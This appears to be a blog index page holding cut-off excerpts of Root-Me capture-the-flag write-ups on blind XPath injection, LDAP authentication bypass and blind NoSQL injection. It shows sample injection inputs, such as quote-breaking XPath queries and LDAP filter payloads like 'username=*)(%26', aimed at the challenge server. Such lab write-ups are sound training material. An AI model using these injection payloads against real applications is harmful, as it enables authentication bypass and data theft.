Protected: MeepwnCTF2018 – Map lờ

There is no excerpt because this is a protected post.


[root-me] XPath injection – blind

Statement: You’ve to retrieve the administrator password.

http://challenge01.root-me.org/web-serveur/ch24/?action=user&userid=1' => XPath error: //user[userid=1\']

Single quotes and many special characters were escaped, which means I can't use a string with quotes directly to find the password value, so I will compare substring to substring, but we have to find the password length first.

http://challenge01.root-me.org/web-serveur/ch24/?action=user&userid=111111 ] | //user[1][userid=1 and …

[root-me] LDAP injection – authentication

Statement: Bypass authentication mechanism.

input: username=*)&password=111
ERROR : Invalid LDAP syntax : (&(uid=*))(userPassword=111)) (we know query structure)

input: username=*)(%26&password=111
which will become (&(uid=*)(&)(userPassword=111)), but the output is: unknown identifiers ... which means my input has no error but I need to add more things ...

Please read 4.2.1 section from their document !!!

(|(type=Rsc1)(type=Rsc2)) If the …

[root-me] NoSQL injection – blind

Statement: This is a little web application to test challenge flags. Retrieve the flag for the challenge ’nosqlblind’.

I wasted my time for this challenge ... because of the "#" character ... I don't think it is the comment character in MongoDB until... please read this document, it will help you a lot: https://docs.mongodb.com/manual/reference/operator/query/regex/

yeah, regex is …